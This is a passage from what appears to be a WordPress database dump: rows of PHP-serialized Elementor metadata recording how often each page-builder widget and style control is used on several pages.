1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:26:\"typography_text_decoration\";i:1;s:10:\"text_color\";i:1;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:4:{s:5:\"title\";i:6;s:11:\"header_size\";i:4;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:3;s:21:\"typography_typography\";i:3;s:20:\"typography_font_size\";i:3;s:22:\"typography_font_weight\";i:3;s:25:\"typography_text_transform\";i:3;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:2;s:10:\"image_size\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}}}s:4:\"form\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:5:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:2;s:11:\"form_fields\";i:2;s:10:\"input_size\";i:2;s:11:\"show_labels\";i:2;}s:21:\"section_submit_button\";a:3:{s:11:\"button_text\";i:2;s:12:\"button_width\";i:1;s:11:\"button_size\";i:1;}s:13:\"section_email\";a:3:{s:13:\"email_subject\";i:2;s:10:\"email_from\";i:2;s:15:\"email_from_name\";i:2;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:2;s:12:\"email_from_2\";i:2;s:17:\"email_from_name_2\";i:2;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:2;s:13:\"error_message\";i:2;s:22:\"required_field_message\";i:2;s:15:\"invalid_message\";i:2;}}s:5:\"style\";a:3:{s:18:\"section_form_style\";a:5:{s:10:\"column_gap\";i:1;s:7:\"row_gap\";i:1;s:11:\"label_color\";i:1;s:27:\"label_typography_typography\";i:1;s:26:\"label_typography_font_size\";i:1;}s:19:\"section_field_style\";a:6:{s:16:\"field_text_color\";i:1;s:27:\"field_typography_typography\";i:1;s:26:\"field_typography_font_size\";i:1;s:28:\"field_typography_font_weight\";i:1;s:18:\"field_border_width\";i:1;s:19:\"field_border_radius\";i:1;}s:20:\"section_button_style\";a:9:{s:23:\"button_background_color\";i:1;s:17:\"button_text_color\";i:1;s:28:\"button_typography_typography\";i:1;s:27:\"button_typography_font_size\";i:1;s:29:\"button_typography_font_weight\";i:1;s:32:\"button_typography_text_transform\";i:1;s:20:\"button_border_radius\";i:1;s:29:\"button_background_hover_color\";i:1;s:18:\"button_hover_color\";i:1;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:3;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:2:{s:10:\"icon_align\";i:1;s:13:\"space_between\";i:2;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:3;}s:18:\"section_text_style\";a:7:{s:11:\"text_indent\";i:3;s:26:\"icon_typography_typography\";i:3;s:25:\"icon_typography_font_size\";i:3;s:27:\"icon_typography_line_height\";i:1;s:10:\"text_color\";i:2;s:27:\"icon_typography_font_weight\";i:2;s:32:\"icon_typography_font_size_tablet\";i:2;}}}}}'),(1677,174,'_elementor_controls_usage','a:3:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}}'),(1679,157,'_elementor_controls_usage','a:8:{s:15:\"theme-site-logo\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:2:{s:5:\"width\";i:1;s:12:\"width_mobile\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:12:\"align_mobile\";i:1;s:5:\"image\";i:1;s:5:\"align\";i:1;s:4:\"link\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:8;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:7;s:19:\"_inline_size_mobile\";i:4;s:19:\"_inline_size_tablet\";i:4;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:13:\"margin_tablet\";i:1;s:13:\"margin_mobile\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:2;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:6:{s:13:\"custom_height\";i:1;s:16:\"content_position\";i:2;s:6:\"height\";i:1;s:20:\"custom_height_mobile\";i:1;s:20:\"custom_height_tablet\";i:1;s:3:\"gap\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:4:{s:21:\"background_background\";i:3;s:16:\"background_color\";i:3;s:18:\"background_color_b\";i:2;s:25:\"background_gradient_angle\";i:1;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:2;s:12:\"border_width\";i:2;s:12:\"border_color\";i:2;}}s:8:\"advanced\";a:2:{s:16:\"section_advanced\";a:4:{s:6:\"margin\";i:2;s:14:\"padding_tablet\";i:3;s:14:\"padding_mobile\";i:3;s:7:\"padding\";i:2;}s:15:\"section_effects\";a:1:{s:6:\"sticky\";i:1;}}}}s:8:\"nav-menu\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:7:{s:11:\"align_items\";i:1;s:14:\"animation_line\";i:1;s:14:\"animation_text\";i:1;s:7:\"pointer\";i:1;s:8:\"dropdown\";i:1;s:10:\"full_width\";i:1;s:20:\"animation_background\";i:1;}}s:5:\"style\";a:3:{s:23:\"section_style_main-menu\";a:9:{s:15:\"color_menu_item\";i:1;s:21:\"color_menu_item_hover\";i:1;s:29:\"pointer_color_menu_item_hover\";i:1;s:26:\"menu_typography_typography\";i:1;s:25:\"menu_typography_font_size\";i:1;s:13:\"pointer_width\";i:1;s:30:\"menu_typography_text_transform\";i:1;s:22:\"color_menu_item_active\";i:1;s:26:\"padding_vertical_menu_item\";i:1;}s:22:\"section_style_dropdown\";a:6:{s:19:\"color_dropdown_item\";i:1;s:30:\"background_color_dropdown_item\";i:1;s:25:\"color_dropdown_item_hover\";i:1;s:36:\"background_color_dropdown_item_hover\";i:1;s:30:\"dropdown_typography_typography\";i:1;s:29:\"dropdown_typography_font_size\";i:1;}s:12:\"style_toggle\";a:6:{s:12:\"toggle_color\";i:1;s:18:\"toggle_color_hover\";i:1;s:11:\"toggle_size\";i:1;s:19:\"toggle_border_width\";i:1;s:20:\"toggle_border_radius\";i:1;s:23:\"toggle_background_color\";i:1;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:4:{s:5:\"title\";i:4;s:11:\"header_size\";i:3;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:3;s:21:\"typography_typography\";i:3;s:20:\"typography_font_size\";i:3;s:22:\"typography_font_weight\";i:3;s:25:\"typography_text_transform\";i:3;}}}}s:4:\"form\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:7:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:2;s:11:\"form_fields\";i:2;s:11:\"show_labels\";i:2;s:10:\"input_size\";i:1;}s:21:\"section_submit_button\";a:3:{s:11:\"button_text\";i:2;s:12:\"button_width\";i:1;s:11:\"button_size\";i:1;}s:13:\"section_email\";a:3:{s:13:\"email_subject\";i:2;s:10:\"email_from\";i:2;s:15:\"email_from_name\";i:2;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:2;s:12:\"email_from_2\";i:2;s:17:\"email_from_name_2\";i:2;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:2;s:13:\"error_message\";i:2;s:22:\"required_field_message\";i:2;s:15:\"invalid_message\";i:2;}s:19:\"section_integration\";a:1:{s:14:\"submit_actions\";i:1;}s:15:\"section_webhook\";a:2:{s:8:\"webhooks\";i:1;s:22:\"webhooks_advanced_data\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_form_style\";a:5:{s:10:\"column_gap\";i:1;s:7:\"row_gap\";i:1;s:11:\"label_color\";i:1;s:27:\"label_typography_typography\";i:1;s:26:\"label_typography_font_size\";i:1;}s:19:\"section_field_style\";a:6:{s:16:\"field_text_color\";i:1;s:27:\"field_typography_typography\";i:1;s:26:\"field_typography_font_size\";i:1;s:28:\"field_typography_font_weight\";i:1;s:18:\"field_border_width\";i:1;s:19:\"field_border_radius\";i:1;}s:20:\"section_button_style\";a:9:{s:23:\"button_background_color\";i:1;s:17:\"button_text_color\";i:1;s:28:\"button_typography_typography\";i:1;s:27:\"button_typography_font_size\";i:1;s:29:\"button_typography_font_weight\";i:1;s:32:\"button_typography_text_transform\";i:1;s:20:\"button_border_radius\";i:1;s:29:\"button_background_hover_color\";i:1;s:18:\"button_hover_color\";i:1;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:2;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:13:\"space_between\";i:2;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:2;}s:18:\"section_text_style\";a:6:{s:10:\"text_color\";i:2;s:11:\"text_indent\";i:2;s:26:\"icon_typography_typography\";i:2;s:25:\"icon_typography_font_size\";i:2;s:27:\"icon_typography_font_weight\";i:2;s:32:\"icon_typography_font_size_tablet\";i:2;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}}}}'),(1681,141,'_elementor_controls_usage','a:6:{s:7:\"heading\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:4:{s:5:\"title\";i:3;s:11:\"header_size\";i:3;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:3;s:21:\"typography_typography\";i:3;s:20:\"typography_font_size\";i:3;s:22:\"typography_font_weight\";i:3;s:25:\"typography_text_transform\";i:3;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:2;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:13:\"space_between\";i:2;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:2;}s:18:\"section_text_style\";a:6:{s:10:\"text_color\";i:2;s:11:\"text_indent\";i:2;s:26:\"icon_typography_typography\";i:2;s:25:\"icon_typography_font_size\";i:2;s:27:\"icon_typography_font_weight\";i:2;s:32:\"icon_typography_font_size_tablet\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:4;s:19:\"_inline_size_tablet\";i:3;s:19:\"_inline_size_mobile\";i:2;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:13:\"margin_tablet\";i:1;s:13:\"margin_mobile\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:2;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}}}s:4:\"form\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:5:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:1;s:11:\"form_fields\";i:1;s:11:\"show_labels\";i:1;s:10:\"input_size\";i:1;}s:21:\"section_submit_button\";a:3:{s:11:\"button_text\";i:1;s:12:\"button_width\";i:1;s:11:\"button_size\";i:1;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:1;s:13:\"error_message\";i:1;s:22:\"required_field_message\";i:1;s:15:\"invalid_message\";i:1;}s:13:\"section_email\";a:3:{s:13:\"email_subject\";i:1;s:10:\"email_from\";i:1;s:15:\"email_from_name\";i:1;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:1;s:12:\"email_from_2\";i:1;s:17:\"email_from_name_2\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_form_style\";a:5:{s:10:\"column_gap\";i:1;s:7:\"row_gap\";i:1;s:11:\"label_color\";i:1;s:27:\"label_typography_typography\";i:1;s:26:\"label_typography_font_size\";i:1;}s:19:\"section_field_style\";a:6:{s:16:\"field_text_color\";i:1;s:27:\"field_typography_typography\";i:1;s:26:\"field_typography_font_size\";i:1;s:28:\"field_typography_font_weight\";i:1;s:18:\"field_border_width\";i:1;s:19:\"field_border_radius\";i:1;}s:20:\"section_button_style\";a:9:{s:23:\"button_background_color\";i:1;s:17:\"button_text_color\";i:1;s:28:\"button_typography_typography\";i:1;s:27:\"button_typography_font_size\";i:1;s:29:\"button_typography_font_weight\";i:1;s:32:\"button_typography_text_transform\";i:1;s:20:\"button_border_radius\";i:1;s:29:\"button_background_hover_color\";i:1;s:18:\"button_hover_color\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}s:14:\"section_layout\";a:1:{s:16:\"content_position\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:4:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;s:18:\"background_color_b\";i:1;s:25:\"background_gradient_angle\";i:1;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:6:\"margin\";i:1;s:7:\"padding\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:1;}}}}}'),(1682,134,'_elementor_controls_usage','a:10:{s:15:\"theme-site-logo\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:2:{s:5:\"width\";i:1;s:12:\"width_mobile\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:12:\"align_mobile\";i:1;s:5:\"image\";i:1;s:5:\"align\";i:1;s:4:\"link\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:8;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:7;s:19:\"_inline_size_mobile\";i:4;s:19:\"_inline_size_tablet\";i:6;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:4:{s:21:\"background_background\";i:1;s:16:\"background_image\";i:1;s:19:\"background_position\";i:1;s:15:\"background_size\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:13:\"margin_tablet\";i:1;s:13:\"margin_mobile\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:2;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:8:{s:13:\"custom_height\";i:2;s:16:\"content_position\";i:3;s:6:\"height\";i:2;s:20:\"custom_height_mobile\";i:2;s:20:\"custom_height_tablet\";i:2;s:3:\"gap\";i:1;s:6:\"layout\";i:1;s:15:\"column_position\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:4:{s:21:\"background_background\";i:4;s:16:\"background_color\";i:4;s:18:\"background_color_b\";i:2;s:25:\"background_gradient_angle\";i:1;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:2;s:12:\"border_width\";i:2;s:12:\"border_color\";i:2;}}s:8:\"advanced\";a:3:{s:16:\"section_advanced\";a:4:{s:6:\"margin\";i:2;s:14:\"padding_tablet\";i:3;s:14:\"padding_mobile\";i:3;s:7:\"padding\";i:2;}s:15:\"section_effects\";a:1:{s:6:\"sticky\";i:1;}s:19:\"_section_responsive\";a:1:{s:20:\"reverse_order_mobile\";i:1;}}}}s:8:\"nav-menu\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:7:{s:11:\"align_items\";i:1;s:14:\"animation_line\";i:1;s:14:\"animation_text\";i:1;s:7:\"pointer\";i:1;s:8:\"dropdown\";i:1;s:10:\"full_width\";i:1;s:20:\"animation_background\";i:1;}}s:5:\"style\";a:3:{s:23:\"section_style_main-menu\";a:9:{s:15:\"color_menu_item\";i:1;s:21:\"color_menu_item_hover\";i:1;s:29:\"pointer_color_menu_item_hover\";i:1;s:26:\"menu_typography_typography\";i:1;s:25:\"menu_typography_font_size\";i:1;s:13:\"pointer_width\";i:1;s:30:\"menu_typography_text_transform\";i:1;s:22:\"color_menu_item_active\";i:1;s:26:\"padding_vertical_menu_item\";i:1;}s:22:\"section_style_dropdown\";a:6:{s:19:\"color_dropdown_item\";i:1;s:30:\"background_color_dropdown_item\";i:1;s:25:\"color_dropdown_item_hover\";i:1;s:36:\"background_color_dropdown_item_hover\";i:1;s:30:\"dropdown_typography_typography\";i:1;s:29:\"dropdown_typography_font_size\";i:1;}s:12:\"style_toggle\";a:6:{s:12:\"toggle_color\";i:1;s:18:\"toggle_color_hover\";i:1;s:11:\"toggle_size\";i:1;s:19:\"toggle_border_width\";i:1;s:20:\"toggle_border_radius\";i:1;s:23:\"toggle_background_color\";i:1;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:13:\"section_title\";a:5:{s:5:\"title\";i:5;s:11:\"header_size\";i:5;s:5:\"align\";i:2;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:8:{s:11:\"title_color\";i:5;s:21:\"typography_typography\";i:5;s:20:\"typography_font_size\";i:5;s:22:\"typography_font_weight\";i:4;s:22:\"typography_line_height\";i:2;s:27:\"typography_font_size_tablet\";i:2;s:27:\"typography_font_size_mobile\";i:1;s:25:\"typography_text_transform\";i:4;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:3:{s:8:\"_padding\";i:1;s:14:\"_margin_mobile\";i:1;s:15:\"_padding_tablet\";i:1;}}}}s:6:\"button\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:5;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_button\";a:5:{s:4:\"text\";i:1;s:4:\"size\";i:1;s:5:\"align\";i:1;s:11:\"icon_indent\";i:1;s:4:\"link\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:5:{s:21:\"typography_typography\";i:1;s:25:\"typography_text_transform\";i:1;s:13:\"border_radius\";i:1;s:25:\"typography_letter_spacing\";i:1;s:27:\"typography_font_size_tablet\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:3:{s:7:\"_margin\";i:1;s:14:\"_margin_tablet\";i:1;s:14:\"_margin_mobile\";i:1;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:12:\"space_mobile\";i:1;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:2;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:13:\"space_between\";i:2;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:2;}s:18:\"section_text_style\";a:6:{s:10:\"text_color\";i:2;s:11:\"text_indent\";i:2;s:26:\"icon_typography_typography\";i:2;s:25:\"icon_typography_font_size\";i:2;s:27:\"icon_typography_font_weight\";i:2;s:32:\"icon_typography_font_size_tablet\";i:2;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}}}s:4:\"form\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:5:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:1;s:11:\"form_fields\";i:1;s:11:\"show_labels\";i:1;s:10:\"input_size\";i:1;}s:21:\"section_submit_button\";a:3:{s:11:\"button_text\";i:1;s:12:\"button_width\";i:1;s:11:\"button_size\";i:1;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:1;s:13:\"error_message\";i:1;s:22:\"required_field_message\";i:1;s:15:\"invalid_message\";i:1;}s:13:\"section_email\";a:3:{s:13:\"email_subject\";i:1;s:10:\"email_from\";i:1;s:15:\"email_from_name\";i:1;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:1;s:12:\"email_from_2\";i:1;s:17:\"email_from_name_2\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_form_style\";a:5:{s:10:\"column_gap\";i:1;s:7:\"row_gap\";i:1;s:11:\"label_color\";i:1;s:27:\"label_typography_typography\";i:1;s:26:\"label_typography_font_size\";i:1;}s:19:\"section_field_style\";a:6:{s:16:\"field_text_color\";i:1;s:27:\"field_typography_typography\";i:1;s:26:\"field_typography_font_size\";i:1;s:28:\"field_typography_font_weight\";i:1;s:18:\"field_border_width\";i:1;s:19:\"field_border_radius\";i:1;}s:20:\"section_button_style\";a:9:{s:23:\"button_background_color\";i:1;s:17:\"button_text_color\";i:1;s:28:\"button_typography_typography\";i:1;s:27:\"button_typography_font_size\";i:1;s:29:\"button_typography_font_weight\";i:1;s:32:\"button_typography_text_transform\";i:1;s:20:\"button_border_radius\";i:1;s:29:\"button_background_hover_color\";i:1;s:18:\"button_hover_color\";i:1;}}}}}'),(1684,115,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:1;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:10:\"icon_align\";i:1;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:1;}s:18:\"section_text_style\";a:4:{s:11:\"text_indent\";i:1;s:26:\"icon_typography_typography\";i:1;s:25:\"icon_typography_font_size\";i:1;s:27:\"icon_typography_line_height\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:2;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}}'),(1685,109,'_elementor_controls_usage','a:3:{s:11:\"breadcrumbs\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:27:\"section_breadcrumbs_content\";a:1:{s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:26:\"typography_text_decoration\";i:1;s:10:\"text_color\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:14:\"section_layout\";a:1:{s:15:\"stretch_section\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}}'),(1688,73,'_elementor_controls_usage','a:8:{s:15:\"theme-site-logo\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:2:{s:5:\"width\";i:1;s:12:\"width_mobile\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:12:\"align_mobile\";i:1;s:5:\"image\";i:1;s:5:\"align\";i:1;s:4:\"link\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:8;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:7;s:19:\"_inline_size_mobile\";i:4;s:19:\"_inline_size_tablet\";i:4;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:13:\"margin_tablet\";i:1;s:13:\"margin_mobile\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:2;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:6:{s:13:\"custom_height\";i:1;s:16:\"content_position\";i:2;s:6:\"height\";i:1;s:20:\"custom_height_mobile\";i:1;s:20:\"custom_height_tablet\";i:1;s:3:\"gap\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:4:{s:21:\"background_background\";i:3;s:16:\"background_color\";i:3;s:18:\"background_color_b\";i:2;s:25:\"background_gradient_angle\";i:1;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:2;s:12:\"border_width\";i:2;s:12:\"border_color\";i:2;}}s:8:\"advanced\";a:2:{s:16:\"section_advanced\";a:4:{s:6:\"margin\";